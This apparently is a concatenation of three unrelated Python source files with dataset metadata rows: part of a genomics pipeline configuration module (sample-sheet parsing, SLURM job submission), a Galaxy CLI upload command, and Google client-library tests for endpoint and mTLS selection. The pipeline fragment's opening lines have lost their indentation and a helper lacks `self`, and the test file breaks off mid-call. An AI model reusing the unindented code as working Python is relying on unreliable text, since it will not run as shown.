setattr(self, analysis, dotdictify(values))
for command, params in values.items():
#setattr(self, command, dotdictify(params))
if command in tools:
# Generate command options
opts = self.format_command_options(params)
analysis_attr = getattr(self, analysis)
setattr(analysis_attr, command + "_options", opts)
setattr(self, analysis, analysis_attr)
# Setup command info
self.cmd = dotdictify(self.config["COMMANDS"])
# Set up entity-attribute-value
self.eav = EAV()
self.eav.file = self.config_name + ".eav.txt"
# snp callers
self.snp_callers = [x for x in self.cmd.snps if x in available_snp_callers]
# Setup union variant sets (for SNP and INDEL)
self.union_variants = dotdictify()
for caller in self.snp_callers:
for variant_type in ["ALL","SNP", "INDEL"]:
self.union_variants[caller][variant_type] = "{self.config_name}.{variant_type}.{caller}.union_variants.txt".format(**locals())
# Setup Reference Here
ref_dir = "{script_dir}/genomes/{self.reference}/*f*.gz".format(**locals())
try:
self.reference_file = glob.glob(ref_dir)[0]
assert(file_exists(self.reference_file))
except:
msg("Reference file '%s' does not exist" % (self.reference), "error")
def log(self, msg, analysis_type=""):
""" Adds to the log file for a given analysis. """
self.general_log.add(msg, analysis_type)
def command(self, command):
""" Runs a command in the shell and logs that it was run. """
out = Popen(command, shell=True, stdout=PIPE, stderr=None)
for line in out.stdout:
print(line)
if out.stderr is not None:
raise Exception(out.stderr)
def format_command_options(self, command_config):
"""
Performs standard formatting of commands being run.
"""
opts = ""
if command_config is not None:
for k, v in command_config.items():
# Use '__' for custom options
if k.startswith("__"):
pass
# Use '_' to designate flags.
elif k.startswith("_"):
opts += " %s " % v
else:
opts += "%s %s " % (k, v)
return opts
else:
return ""
def get_node():
self.node_index += 1
return str(self.nodes[node_index % len(self.nodes)])
def submit_job(self,
command,
analysis_type,
log_name,
dependencies=None,
dependency_type="afterok"):
""" Submit a job to the cluster """
# Insert dependencies, output_dir, and nodes
if LOCAL is False:
self.log(command, "sbatch")
command = command.split(" ")
# Output Dirs
log_file = "{self.log_dir}/{analysis_type}.{log_name}.%N.%j".format(**locals())
output_dirs = " --output={log_file}.txt --error={log_file}.err ".format(**locals())
# Node
if hasattr(self, "nodes"):
use_node = "--nodelist={node} ".format(node="node" + get_node())
command.insert(1, use_node)
# Dependencies
if dependencies is not None:
if len(dependencies) > 0:
dependencies = ':'.join(dependencies)
depends_on = " --dependency={dep_type}:".format(**locals())
depends_on += dependencies
else:
depends_on = ""
command.insert(1, depends_on)
else:
depends_on = ""
print command
command = ' '.join(command)
jobid, err = Popen(command, stdout=PIPE, stderr=PIPE, shell=True).communicate()
jobid = jobid.strip().split(" ")[-1]
print("Submitted job [{jobid}:{analysis_type}:{log_name}]".format(**locals()))
if dependencies is not None:
print("Dependencies: {dependencies}".format(dependencies=', '.join(dependencies)))
if jobid.isdigit() is False:
raise Exception("Error submitting %s" % jobid)
exit()
else:
return jobid
else:
self.log(command, "python")
self.command(command)
def get_sample_file(self):
"""
Returns the sample file object
"""
return sample_file(self.sample_file, self)
def chunk_genome(self):
"""
Parses bwa .ann file to retrieve chromosome sizes
for chunking purposes
"""
ann = open(self.reference_file + ".ann").read()
# Parsing .ann files
contigs = [x.split(" ")[1] for x in ann.split("\n")[1:-1:1]][::2]
contig_sizes = map(int, [x.split(" ")[1] for x in ann.split("\n")[1:-1:1]][1::2])
chunk_size = self.chrom_chunk_kb * 1000
chunk_set = []
for chrom, size in zip(contigs, contig_sizes):
for chunk in xrange(1, size, chunk_size):
if chunk + chunk_size > size:
chunk_end = size
else:
chunk_end = chunk + chunk_size-1
chunk_set.append("{chrom}:{chunk}-{chunk_end}".format(**locals()).strip())
return chunk_set
def get_non_uniq(non_uniq_list):
non_uniq_list = list(set([x for x in non_uniq_list if non_uniq_list.count(x) > 1]))
if len(non_uniq_list) > 0:
return non_uniq_list
else:
return None
class sample_file:
    """
    Class for handling actions associated with the sample file:
    """
    def __init__(self, filename, config):
        # filename: path to the tab-delimited sample sheet.
        # config: the pipeline configuration object; provides fastq_dir,
        # bam_dir, vcf_dir and snp_callers (presumably — confirm in caller).
        self.filename = filename
        self.config = config
        # Required, non-empty columns for every sample-sheet row.
        self.sample_file_vars = ["FQ1", "FQ2", "ID", "LB", "SM"]
        # If the sample file exists, don't attempt to open it.
        if not file_exists(filename):
            # NOTE(review): returning None from __init__ still yields a
            # (partially initialised) instance; the sets below are then unset.
            return None
        self.sample_file = open(filename, 'rU')
        # Define Sets
        self.fastq_set = []
        self.ID_set = []  # Used with Individual Bam Set.
        self.SM_Group_set = dotdictify()  # Tracks bams (by ID) belonging to a sample.
        self.fq_set = []
        with self.sample_file as f:
            iter_csv = csv.DictReader(f, delimiter='\t', quoting=csv.QUOTE_NONE)
            for line, row in enumerate(iter_csv):
                # 1-based index
                line += 1
                row["line"] = line
                # Track IDs
                ID = row["ID"]
                SM = row["SM"]
                self.ID_set.append(ID)
                # set fq names.
                fq1, fq2 = row["FQ1"], row["FQ2"]
                # Fastq paths are resolved relative to the configured fastq dir.
                fq_pair = tuple(config.fastq_dir + "/" + x for x in [fq1, fq2])
                # save fq pair
                row["fq_pair"] = fq_pair
                fq_exists = map(file_exists, fq_pair)
                self.fastq_set.append(fq_pair)
                empty_vals = [x for x in self.sample_file_vars if not row[x]]
                # Run basic checks; msg(..., "error") reports the problem
                # (presumably aborting — confirm msg semantics).
                if row["FQ1"] == row["FQ2"]:
                    msg(
                        "Both Fastq's share same name on line %s in %s: %s" % (line, self.filename, fq1), "error")
                elif row["SM"] == row["ID"]:
                    msg(
                        "Sample Name and Sample ID can not be the same in %s [line %s - %s]" %
                        (self.filename, line, row["ID"]), "error")
                elif len(empty_vals) > 0:
                    empty_vals = ','.join(empty_vals)
                    msg("Missing values on line %s of %s: %s" % (line, self.filename, empty_vals), "error")
                elif not all(fq_exists):
                    missing_fastq = ','.join([fq_pair[x] for x in range(0, 2) if not fq_exists[x]])
                    msg(
                        "Fastq(s) Missing on line %s in %s: %s" % (line, self.filename, missing_fastq), "error")
                # Default platform when the PL column is empty/missing.
                if not row["PL"]:
                    row["PL"] = "ILLUMINA"
                # Construct a dictionary for read group for comparisons
                RG = dict([(k, v) for k, v in row.items() if k in ("ID", "LB", "SM", "PL",)])
                # Also Construct Raw Read Group (for aligning)
                rg_dat = [k + ":" + v for k, v in RG.items()]
                raw_RG = r"@RG\t" + r'\t'.join(sorted(rg_dat))
                bam_ind_filename = config.bam_dir + "/" + row["ID"] + ".bam"
                bam_merged_filename = config.bam_dir + "/" + row["SM"] + ".bam"
                row["RG"] = RG
                row["raw_RG"] = raw_RG
                row["bam_ind_filename"] = bam_ind_filename
                row["bam_merged_filename"] = bam_merged_filename
                # Group IDs and Samples by Read Group
                if SM not in self.SM_Group_set:
                    self.SM_Group_set[SM] = {"ID": [],
                                             "RG": [],
                                             "fq": [],
                                             "raw_RG": [],
                                             "bam_ind_filename": []}
                self.SM_Group_set[SM]["ID"].append(ID)
                self.SM_Group_set[SM]["RG"].append(RG)
                self.SM_Group_set[SM]["SM"] = SM
                # Keep RG list in a deterministic order for later equality checks.
                self.SM_Group_set[SM]["RG"] = sorted(self.SM_Group_set[SM]["RG"])
                self.SM_Group_set[SM]["fq"].append(fq_pair)
                self.SM_Group_set[SM]["raw_RG"].append(raw_RG)
                self.SM_Group_set[SM]["bam_ind_filename"].append(bam_ind_filename)
                self.SM_Group_set[SM]["bam_merged_filename"] = bam_merged_filename
                # Add vcf files
                # NOTE(review): vcf_files is reset to {} for every row of the
                # same SM; the paths are deterministic so this is idempotent.
                self.SM_Group_set[SM]["vcf_files"] = {}
                for caller in config.snp_callers:
                    for call_type in ["individual", "union"]:
                        for variant_type in ["ALL", "SNP", "INDEL", "SV", "CNV", "TRANSPOSON"]:
                            vcf_ind = "{config.vcf_dir}/{SM}.{variant_type}.{caller}.{call_type}.vcf.gz".format(**locals())
                            # NOTE(review): relies on dotdictify auto-creating
                            # the "<caller>_<call_type>" key on first access;
                            # a plain dict would raise KeyError here — confirm.
                            self.SM_Group_set[SM]["vcf_files"][caller + "_" + call_type][variant_type] = vcf_ind
                # Remove keys incorporated into RG
                del row["LB"]
                del row["PL"]
                del row["SM"]
                # If all checks passed, append row dictionary
                self.fq_set.append(row)
        # Check that all IDs are uniq
        non_uniq_IDs = get_non_uniq(self.ID_set)
        if get_non_uniq(self.ID_set):
            raise Exception(
                "Non-uniq IDs exist: %s" % ', '.join(non_uniq_IDs))
        # Check that all fastq sets are uniq
        non_uniq_fastq_set = get_non_uniq(self.fastq_set)
        if non_uniq_fastq_set:
            raise Exception(
                "Non-uniq Fastqs exist: %s" % ', '.join(non_uniq_fastq_set[0]))

    def new_sample_file(self):
        """
        Generates a new sample file from a directory
        """
        # Header row: the required columns plus a trailing RUN column.
        header = '\t'.join(self.sample_file_vars + ["RUN\n"])
        sample_filename = self.filename
        if is_dir(sample_filename):
            msg("Sample file is a directory", "error")
        new_sample_file = open(sample_filename, 'w')
        new_sample_file.write(header)
        sample_set = sorted(glob.glob(self.config.fastq_dir + "/*.fq.gz"))
        # Pair R1/R2 fastqs by sorted basename ("1.fq.gz" vs "2.fq.gz" suffix).
        fastq_pairs = zip(sorted([os.path.split(x)[1] for x in sample_set if x.find("1.fq.gz") != -1]),
                          sorted([os.path.split(x)[1] for x in sample_set if x.find("2.fq.gz") != -1]))
        for pair in fastq_pairs:
            # The shared filename prefix (minus separators) becomes the ID.
            ID = common_prefix(pair).strip("-_")
            new_sample_file.write("\t".join(pair) + "\t" + ID + "\n")
        msg("Sample File Created")
        # Deliberately terminates the process: a fresh sample sheet needs
        # manual review before the pipeline proceeds.
        exit(0)

    def check_bams(self):
        """
        Generates list of bam merged (multi-sample)
        files; whether or not they exist, and whether
        or not they have the correct read group
        which reflects
        """
        for bam in self.SM_Group_set.values():
            bam["bam_merged_exists_and_RG_correct"] = False
            bam["bam_ind_exists_and_RG_correct"] = []
            if check_seq_file(bam["bam_merged_filename"]):
                # Merged bam counts as valid only when its read groups match
                # the sample sheet exactly.
                if bam["RG"] == bamfile(bam["bam_merged_filename"]).RG:
                    bam["bam_merged_exists_and_RG_correct"] = True
            bam["bam_ind_exists_and_RG_correct"] = []
            for ind_bam in bam["bam_ind_filename"]:
                if check_seq_file(ind_bam):
                    if bamfile(ind_bam).RG[0] in bam["RG"]:
                        bam["bam_ind_exists_and_RG_correct"].append(True)
                    else:
                        # NOTE(review): indentation reconstructed — assumed the
                        # else pairs with the RG check, so a missing file
                        # appends nothing; confirm against upstream history.
                        bam["bam_ind_exists_and_RG_correct"].append(False)
            yield dotdictify(bam)
| AndersenLab/pyPipeline | utils/configuration.py | Python | mit | 15,150 | [
"BWA"
] | e03cf120e89a803c689825b8b98370752e7731467f40fff478d1c57014ccd16b |
import click
from parsec.cli import pass_context, json_loads
from parsec.decorators import custom_exception, json_output
@click.command('upload_file_from_url')
# Positional CLI arguments: destination library and source URL.
@click.argument("library_id", type=str)
@click.argument("file_url", type=str)
@click.option(
    "--folder_id",
    help="id of the folder where to place the uploaded file. If not provided, the root folder will be used",
    type=str
)
@click.option(
    "--file_type",
    help="Galaxy file format name",
    default="auto",
    show_default=True,
    type=str
)
@click.option(
    "--dbkey",
    help="Dbkey",
    default="?",
    show_default=True,
    type=str
)
@click.option(
    "--tags",
    help="A list of tags to add to the datasets",
    type=str,
    multiple=True
)
@pass_context
@custom_exception
@json_output
def cli(ctx, library_id, file_url, folder_id="", file_type="auto", dbkey="?", tags=""):
    """Upload a file to a library from a URL.

Output:

    List with a single dictionary containing information about the LDDA
    """
    # Delegate to BioBlend's LibraryClient on the Galaxy instance held by the
    # context.  Click supplies the option values at runtime (tags arrives as a
    # tuple because of multiple=True); the signature defaults only apply when
    # the function is invoked programmatically.  @json_output serialises the
    # returned LDDA description for the terminal.
    return ctx.gi.libraries.upload_file_from_url(library_id, file_url, folder_id=folder_id, file_type=file_type, dbkey=dbkey, tags=tags)
| galaxy-iuc/parsec | parsec/commands/libraries/upload_file_from_url.py | Python | apache-2.0 | 1,148 | [
"Galaxy"
] | 6b22743d3072bdd28309e742c1ba7594e89352fd18abaf814d8607cdeae70e7c |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.monitoring_dashboard_v1.services.dashboards_service import (
DashboardsServiceAsyncClient,
)
from google.cloud.monitoring_dashboard_v1.services.dashboards_service import (
DashboardsServiceClient,
)
from google.cloud.monitoring_dashboard_v1.services.dashboards_service import pagers
from google.cloud.monitoring_dashboard_v1.services.dashboards_service import transports
from google.cloud.monitoring_dashboard_v1.types import alertchart
from google.cloud.monitoring_dashboard_v1.types import common
from google.cloud.monitoring_dashboard_v1.types import dashboard
from google.cloud.monitoring_dashboard_v1.types import dashboards_service
from google.cloud.monitoring_dashboard_v1.types import layouts
from google.cloud.monitoring_dashboard_v1.types import metrics
from google.cloud.monitoring_dashboard_v1.types import scorecard
from google.cloud.monitoring_dashboard_v1.types import text
from google.cloud.monitoring_dashboard_v1.types import widget
from google.cloud.monitoring_dashboard_v1.types import xychart
from google.oauth2 import service_account
from google.protobuf import duration_pb2 # type: ignore
import google.auth
def client_cert_source_callback():
    """Return a dummy (certificate, key) byte pair for mTLS test fixtures."""
    cert_bytes = b"cert bytes"
    key_bytes = b"key bytes"
    return (cert_bytes, key_bytes)
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
    """Return "foo.googleapis.com" when *client*'s default endpoint points at
    localhost; otherwise return the client's default endpoint unchanged.

    Used so endpoint-selection tests can tell a locally patched default apart
    from the production endpoint.
    """
    if "localhost" in client.DEFAULT_ENDPOINT:
        return "foo.googleapis.com"
    return client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
    """_get_default_mtls_endpoint maps *.googleapis.com hosts to their
    *.mtls.* variant, leaves already-mtls and non-Google hosts unchanged,
    and passes None through."""
    api_endpoint = "example.googleapis.com"
    api_mtls_endpoint = "example.mtls.googleapis.com"
    sandbox_endpoint = "example.sandbox.googleapis.com"
    sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
    non_googleapi = "api.example.com"

    assert DashboardsServiceClient._get_default_mtls_endpoint(None) is None
    assert (
        DashboardsServiceClient._get_default_mtls_endpoint(api_endpoint)
        == api_mtls_endpoint
    )
    # An endpoint that is already mtls stays as-is.
    assert (
        DashboardsServiceClient._get_default_mtls_endpoint(api_mtls_endpoint)
        == api_mtls_endpoint
    )
    assert (
        DashboardsServiceClient._get_default_mtls_endpoint(sandbox_endpoint)
        == sandbox_mtls_endpoint
    )
    assert (
        DashboardsServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
        == sandbox_mtls_endpoint
    )
    # Non-Google hosts are returned unchanged.
    assert (
        DashboardsServiceClient._get_default_mtls_endpoint(non_googleapi)
        == non_googleapi
    )
@pytest.mark.parametrize(
    "client_class", [DashboardsServiceClient, DashboardsServiceAsyncClient,]
)
def test_dashboards_service_client_from_service_account_info(client_class):
    """from_service_account_info builds a client whose transport carries the
    credentials produced by the (mocked) service-account factory."""
    creds = ga_credentials.AnonymousCredentials()
    with mock.patch.object(
        service_account.Credentials, "from_service_account_info"
    ) as factory:
        factory.return_value = creds
        info = {"valid": True}
        client = client_class.from_service_account_info(info)
        assert client.transport._credentials == creds
        assert isinstance(client, client_class)

        assert client.transport._host == "monitoring.googleapis.com:443"
@pytest.mark.parametrize(
    "transport_class,transport_name",
    [
        (transports.DashboardsServiceGrpcTransport, "grpc"),
        (transports.DashboardsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
    ],
)
def test_dashboards_service_client_service_account_always_use_jwt(
    transport_class, transport_name
):
    """The transport requests self-signed JWT access from service-account
    credentials exactly when always_use_jwt_access=True."""
    with mock.patch.object(
        service_account.Credentials, "with_always_use_jwt_access", create=True
    ) as use_jwt:
        creds = service_account.Credentials(None, None, None)
        transport = transport_class(credentials=creds, always_use_jwt_access=True)
        use_jwt.assert_called_once_with(True)

    with mock.patch.object(
        service_account.Credentials, "with_always_use_jwt_access", create=True
    ) as use_jwt:
        creds = service_account.Credentials(None, None, None)
        transport = transport_class(credentials=creds, always_use_jwt_access=False)
        use_jwt.assert_not_called()
@pytest.mark.parametrize(
    "client_class", [DashboardsServiceClient, DashboardsServiceAsyncClient,]
)
def test_dashboards_service_client_from_service_account_file(client_class):
    """Both from_service_account_file and its _json alias construct a client
    using the credentials returned by the (mocked) file factory."""
    creds = ga_credentials.AnonymousCredentials()
    with mock.patch.object(
        service_account.Credentials, "from_service_account_file"
    ) as factory:
        factory.return_value = creds
        client = client_class.from_service_account_file("dummy/file/path.json")
        assert client.transport._credentials == creds
        assert isinstance(client, client_class)

        # The _json spelling is an alias of the same factory.
        client = client_class.from_service_account_json("dummy/file/path.json")
        assert client.transport._credentials == creds
        assert isinstance(client, client_class)

        assert client.transport._host == "monitoring.googleapis.com:443"
def test_dashboards_service_client_get_transport_class():
    """get_transport_class returns the gRPC transport both by default and
    when requested explicitly by name."""
    transport = DashboardsServiceClient.get_transport_class()
    available_transports = [
        transports.DashboardsServiceGrpcTransport,
    ]
    assert transport in available_transports

    transport = DashboardsServiceClient.get_transport_class("grpc")
    assert transport == transports.DashboardsServiceGrpcTransport
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name",
    [
        (DashboardsServiceClient, transports.DashboardsServiceGrpcTransport, "grpc"),
        (
            DashboardsServiceAsyncClient,
            transports.DashboardsServiceGrpcAsyncIOTransport,
            "grpc_asyncio",
        ),
    ],
)
@mock.patch.object(
    DashboardsServiceClient,
    "DEFAULT_ENDPOINT",
    modify_default_endpoint(DashboardsServiceClient),
)
@mock.patch.object(
    DashboardsServiceAsyncClient,
    "DEFAULT_ENDPOINT",
    modify_default_endpoint(DashboardsServiceAsyncClient),
)
def test_dashboards_service_client_client_options(
    client_class, transport_class, transport_name
):
    """Client construction honours client_options and the
    GOOGLE_API_USE_MTLS_ENDPOINT / GOOGLE_API_USE_CLIENT_CERTIFICATE
    environment variables when choosing endpoint and transport settings."""
    # Check that if channel is provided we won't create a new one.
    with mock.patch.object(DashboardsServiceClient, "get_transport_class") as gtc:
        transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
        client = client_class(transport=transport)
        gtc.assert_not_called()

    # Check that if channel is provided via str we will create a new one.
    with mock.patch.object(DashboardsServiceClient, "get_transport_class") as gtc:
        client = client_class(transport=transport_name)
        gtc.assert_called()

    # Check the case api_endpoint is provided.
    options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(transport=transport_name, client_options=options)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host="squid.clam.whelk",
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )

    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
    # "never".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
        with mock.patch.object(transport_class, "__init__") as patched:
            patched.return_value = None
            client = client_class(transport=transport_name)
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=client.DEFAULT_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )

    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
    # "always".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
        with mock.patch.object(transport_class, "__init__") as patched:
            patched.return_value = None
            client = client_class(transport=transport_name)
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=client.DEFAULT_MTLS_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )

    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
    # unsupported value.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
        with pytest.raises(MutualTLSChannelError):
            client = client_class(transport=transport_name)

    # Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
    with mock.patch.dict(
        os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
    ):
        with pytest.raises(ValueError):
            client = client_class(transport=transport_name)

    # Check the case quota_project_id is provided
    options = client_options.ClientOptions(quota_project_id="octopus")
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(client_options=options, transport=transport_name)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host=client.DEFAULT_ENDPOINT,
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id="octopus",
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name,use_client_cert_env",
    [
        (
            DashboardsServiceClient,
            transports.DashboardsServiceGrpcTransport,
            "grpc",
            "true",
        ),
        (
            DashboardsServiceAsyncClient,
            transports.DashboardsServiceGrpcAsyncIOTransport,
            "grpc_asyncio",
            "true",
        ),
        (
            DashboardsServiceClient,
            transports.DashboardsServiceGrpcTransport,
            "grpc",
            "false",
        ),
        (
            DashboardsServiceAsyncClient,
            transports.DashboardsServiceGrpcAsyncIOTransport,
            "grpc_asyncio",
            "false",
        ),
    ],
)
@mock.patch.object(
    DashboardsServiceClient,
    "DEFAULT_ENDPOINT",
    modify_default_endpoint(DashboardsServiceClient),
)
@mock.patch.object(
    DashboardsServiceAsyncClient,
    "DEFAULT_ENDPOINT",
    modify_default_endpoint(DashboardsServiceAsyncClient),
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_dashboards_service_client_mtls_env_auto(
    client_class, transport_class, transport_name, use_client_cert_env
):
    """With GOOGLE_API_USE_MTLS_ENDPOINT=auto, the client switches to the
    mTLS endpoint iff a client certificate is available (via client_options
    or ADC) and GOOGLE_API_USE_CLIENT_CERTIFICATE is "true"."""
    # This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
    # mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.

    # Check the case client_cert_source is provided. Whether client cert is used depends on
    # GOOGLE_API_USE_CLIENT_CERTIFICATE value.
    with mock.patch.dict(
        os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
    ):
        options = client_options.ClientOptions(
            client_cert_source=client_cert_source_callback
        )
        with mock.patch.object(transport_class, "__init__") as patched:
            patched.return_value = None
            client = client_class(client_options=options, transport=transport_name)

            if use_client_cert_env == "false":
                expected_client_cert_source = None
                expected_host = client.DEFAULT_ENDPOINT
            else:
                expected_client_cert_source = client_cert_source_callback
                expected_host = client.DEFAULT_MTLS_ENDPOINT

            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=expected_host,
                scopes=None,
                client_cert_source_for_mtls=expected_client_cert_source,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )

    # Check the case ADC client cert is provided. Whether client cert is used depends on
    # GOOGLE_API_USE_CLIENT_CERTIFICATE value.
    with mock.patch.dict(
        os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
    ):
        with mock.patch.object(transport_class, "__init__") as patched:
            with mock.patch(
                "google.auth.transport.mtls.has_default_client_cert_source",
                return_value=True,
            ):
                with mock.patch(
                    "google.auth.transport.mtls.default_client_cert_source",
                    return_value=client_cert_source_callback,
                ):
                    if use_client_cert_env == "false":
                        expected_host = client.DEFAULT_ENDPOINT
                        expected_client_cert_source = None
                    else:
                        expected_host = client.DEFAULT_MTLS_ENDPOINT
                        expected_client_cert_source = client_cert_source_callback

                    patched.return_value = None
                    client = client_class(transport=transport_name)
                    patched.assert_called_once_with(
                        credentials=None,
                        credentials_file=None,
                        host=expected_host,
                        scopes=None,
                        client_cert_source_for_mtls=expected_client_cert_source,
                        quota_project_id=None,
                        client_info=transports.base.DEFAULT_CLIENT_INFO,
                        always_use_jwt_access=True,
                    )

    # Check the case client_cert_source and ADC client cert are not provided.
    with mock.patch.dict(
        os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
    ):
        with mock.patch.object(transport_class, "__init__") as patched:
            with mock.patch(
                "google.auth.transport.mtls.has_default_client_cert_source",
                return_value=False,
            ):
                patched.return_value = None
                client = client_class(transport=transport_name)
                patched.assert_called_once_with(
                    credentials=None,
                    credentials_file=None,
                    host=client.DEFAULT_ENDPOINT,
                    scopes=None,
                    client_cert_source_for_mtls=None,
                    quota_project_id=None,
                    client_info=transports.base.DEFAULT_CLIENT_INFO,
                    always_use_jwt_access=True,
                )
@pytest.mark.parametrize(
    "client_class", [DashboardsServiceClient, DashboardsServiceAsyncClient]
)
@mock.patch.object(
    DashboardsServiceClient,
    "DEFAULT_ENDPOINT",
    modify_default_endpoint(DashboardsServiceClient),
)
@mock.patch.object(
    DashboardsServiceAsyncClient,
    "DEFAULT_ENDPOINT",
    modify_default_endpoint(DashboardsServiceAsyncClient),
)
def test_dashboards_service_client_get_mtls_endpoint_and_cert_source(client_class):
    """get_mtls_endpoint_and_cert_source resolves (endpoint, cert_source)
    for every combination of the two mTLS environment variables."""
    mock_client_cert_source = mock.Mock()

    # Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "true".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
        mock_api_endpoint = "foo"
        options = client_options.ClientOptions(
            client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
        )
        api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
            options
        )
        assert api_endpoint == mock_api_endpoint
        assert cert_source == mock_client_cert_source

    # Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "false".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "false"}):
        mock_client_cert_source = mock.Mock()
        mock_api_endpoint = "foo"
        options = client_options.ClientOptions(
            client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
        )
        api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
            options
        )
        assert api_endpoint == mock_api_endpoint
        assert cert_source is None

    # Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "never".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
        api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
        assert api_endpoint == client_class.DEFAULT_ENDPOINT
        assert cert_source is None

    # Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "always".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
        api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
        assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
        assert cert_source is None

    # Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert doesn't exist.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
        with mock.patch(
            "google.auth.transport.mtls.has_default_client_cert_source",
            return_value=False,
        ):
            api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
            assert api_endpoint == client_class.DEFAULT_ENDPOINT
            assert cert_source is None

    # Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert exists.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
        with mock.patch(
            "google.auth.transport.mtls.has_default_client_cert_source",
            return_value=True,
        ):
            with mock.patch(
                "google.auth.transport.mtls.default_client_cert_source",
                return_value=mock_client_cert_source,
            ):
                (
                    api_endpoint,
                    cert_source,
                ) = client_class.get_mtls_endpoint_and_cert_source()
                assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
                assert cert_source == mock_client_cert_source
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name",
    [
        (DashboardsServiceClient, transports.DashboardsServiceGrpcTransport, "grpc"),
        (
            DashboardsServiceAsyncClient,
            transports.DashboardsServiceGrpcAsyncIOTransport,
            "grpc_asyncio",
        ),
    ],
)
def test_dashboards_service_client_client_options_scopes(
    client_class, transport_class, transport_name
):
    """Scopes supplied via client_options are forwarded verbatim to the
    transport constructor."""
    # Check the case scopes are provided.
    options = client_options.ClientOptions(scopes=["1", "2"],)
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(client_options=options, transport=transport_name)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host=client.DEFAULT_ENDPOINT,
            scopes=["1", "2"],
            client_cert_source_for_mtls=None,
            quota_project_id=None,
